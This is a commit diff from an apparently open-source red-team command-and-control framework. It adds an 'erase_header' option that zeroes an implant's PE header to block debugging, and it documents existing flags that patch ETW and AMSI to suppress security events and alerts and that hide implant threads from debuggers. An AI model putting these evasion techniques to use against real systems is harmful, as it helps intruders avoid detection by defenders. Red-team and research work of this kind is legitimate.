- Fixed "log" build tag not working correctly on *nix

- Added support for the "erase_header" evasion type. - Updated JetStream build tag parser to work correctly. - Updated Cirrus to XMT v0.5.1 - Documentation Updates
iDigitalFlame · Mar 20, 2023 · 2e783ae · 2e783ae
1 parent 802a523
commit 2e783ae
Show file tree

Hide file tree

Showing 10 changed files with 64 additions and 23 deletions.
diff --git a/bolt/z_log.go b/bolt/z_log.go
@@ -29,7 +29,7 @@ import (
 var logger = initLog()
 
 func initLog() logx.Log {
-	f, err := logx.File(os.TempDir()+"\\log-"+util.Uitoa(uint64(os.Getpid()))+".log", logx.Trace)
+	f, err := logx.File(os.TempDir()+string(os.PathSeparator)+"log-"+util.Uitoa(uint64(os.Getpid()))+".log", logx.Trace)
 	if err != nil {
 		return logx.Console(logx.Trace)
 	}

diff --git a/cirrus/various.go b/cirrus/various.go
@@ -299,6 +299,8 @@ func evadePacket(a string) (*com.Packet, string, error) {
 			switch strings.TrimSpace(v[i]) {
 			case "all":
 				f |= device.EvadeAll
+			case "erase_header", "eh":
+				f |= device.EvadeEraseHeader
 			case "patch_etw", "pe", "zerotrace":
 				f |= device.EvadeWinHideThreads
 			case "patch_amsi", "pa", "zeroamsi":

diff --git a/docs/Commands.md b/docs/Commands.md
@@ -522,9 +522,10 @@ Currently the following (Windows Only) evasion procedures are supported:
 
 | Flag                          | OS      | Description                                                                                                      |
 | ----------------------------- | ------- | ---------------------------------------------------------------------------------------------------------------- |
-| patch_etw, pe, zerotrace      | Windows | Patch `Etw*` functions with Assembly that will prevent any events from being executed.                            |
-| patch_amsi, pa, zeroamsi      | Windows | Patch `Amsi*` functions so they return pass values and will not trigger alerts.                                    |
+| patch_etw, pe, zerotrace      | Windows | Patch `Etw*` functions with Assembly that will prevent any events from being executed.                           |
+| patch_amsi, pa, zeroamsi      | Windows | Patch `Amsi*` functions so they return pass values and will not trigger alerts.                                  |
 | hide_threads, ht, zerothreads | Windows | Hide each currently running client implant thread from any debugger  by using the `HideThreadFromDebugger` flag. |
+| erase_header, eh              | Windows | Prevent debugging attempts by zero-ing out the PE header and it's structures.                                    |
 
 The special flag name `all` can be used to run all procedures.
 

diff --git a/doppler/include/cli/bolt.py b/doppler/include/cli/bolt.py
@@ -147,6 +147,8 @@
 _TOGGLES = ["enable", "disable"]
 _AUTO_TYPES = ["asm", "dll", "zombie"]
 _EVADE_TYPES = [
+    "eh",
+    "erase_header",
     "hide_threads",
     "ht",
     "pa",
@@ -1067,6 +1069,10 @@ def do_evade(self, m):
         |  Hide each currently running client implant thread from any debugger
         |  by using the "HideThreadFromDebugger" flag.
 
+        erase_header, eh
+        | Prevent debugging attempts by zero-ing out the PE header and it's
+        | structures.
+
         The special flag name "all" can be used to run all procedures.
 
         Examples:

diff --git a/extra/scripts/setup_old_go.sh b/extra/scripts/setup_old_go.sh
@@ -0,0 +1,16 @@
+#!/usr/bin/bash
+# Copyright (C) 2020 - 2023 iDigitalFlame
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <https://www.gnu.org/licenses/>.
+#
diff --git a/go.mod b/go.mod
@@ -7,6 +7,6 @@ require (
 	github.com/PurpleSec/logx v1.6.1
 	github.com/PurpleSec/routex v1.2.5
 	github.com/gorilla/websocket v1.5.0
-	github.com/iDigitalFlame/xmt v0.5.0
-	golang.org/x/sys v0.5.0
+	github.com/iDigitalFlame/xmt v0.5.1
+	golang.org/x/sys v0.6.0
 )
diff --git a/go.sum b/go.sum
@@ -6,7 +6,7 @@ github.com/PurpleSec/routex v1.2.5 h1:on7pdRBHLYDbO26Rxfa6zGKrkcLsvE/krITSUQ2olF
 github.com/PurpleSec/routex v1.2.5/go.mod h1:YeeIVHnkAVY5iuyQfPh1HPczAs/tB1tC94ktzq66b9Y=
 github.com/gorilla/websocket v1.5.0 h1:PPwGk2jz7EePpoHN/+ClbZu8SPxiqlu12wZP/3sWmnc=
 github.com/gorilla/websocket v1.5.0/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
-github.com/iDigitalFlame/xmt v0.5.0 h1:MZEgxad7fyF8WG3KI3K5R+61HDOJeSETYwVtGEj+uOY=
-github.com/iDigitalFlame/xmt v0.5.0/go.mod h1:hkCY/Lvm9W2572KKLWYz0cCKguqmNWQV9Uz6ojs1+NU=
-golang.org/x/sys v0.5.0 h1:MUK/U/4lj1t1oPg0HfuXDN/Z1wv31ZJ/YcPiGccS4DU=
-golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+github.com/iDigitalFlame/xmt v0.5.1 h1:IBxuTCkyCqWNapBAQbXKhPGvqiru8cCGOEueHO56dhE=
+github.com/iDigitalFlame/xmt v0.5.1/go.mod h1:hkCY/Lvm9W2572KKLWYz0cCKguqmNWQV9Uz6ojs1+NU=
+golang.org/x/sys v0.6.0 h1:MVltZSvRTcU2ljQOhs94SXPftV6DCNnZViHeQps87pQ=
+golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
diff --git a/jetstream/include/crypt.py b/jetstream/include/crypt.py
@@ -262,20 +262,27 @@ def _mask_tables(b, log):
         _mask_tables_inner(b, log)
 
 
-def _use_tag(tags, values):
-    if not isinstance(tags, list) or not isinstance(values, list):
+def _use_tag(current, tags):
+    if not isinstance(tags, list) or not isinstance(current, list) or len(current) == 0:
         return True
-    if len(values) == 0:
-        return True
-    r = True
+    n = True
     for t in tags:
-        for v in values:
-            if t.lower() == v.lower():
-                r = True
-                break
-            if v[0] == "!" and v[1:].lower() == t.lower():
-                return False
-    return r
+        if t[0] != "!":
+            n = False
+            break
+    # Check negatives first
+    for t in tags:
+        if t[0] != "!":
+            continue
+        if t[1:] in current:
+            return False
+    # Check positives
+    for t in tags:
+        if t[0] == "!":
+            continue
+        if t in current:
+            return True
+    return n
 
 
 def _mask_deps(b, start, log):

diff --git a/src b/src
diff --git a/thunderstorm.code-workspace b/thunderstorm.code-workspace
@@ -15,6 +15,7 @@
             "anop",
             "begidx",
             "buildvcs",
+            "cpuid",
             "creds",
             "delims",
             "derp",
@@ -72,6 +73,14 @@
             "zeroamsi",
             "zombified"
         ],
-        "todo-tree.tree.scanMode": "workspace"
+        "todo-tree.tree.scanMode": "workspace",
+        "files.associations": {
+            "*.conf": "properties",
+            "*.run": "shellscript",
+            "*.sh": "shellscript",
+            "*.twig": "django-html",
+            "config": "properties",
+            "*.s": "c"
+        }
     }
 }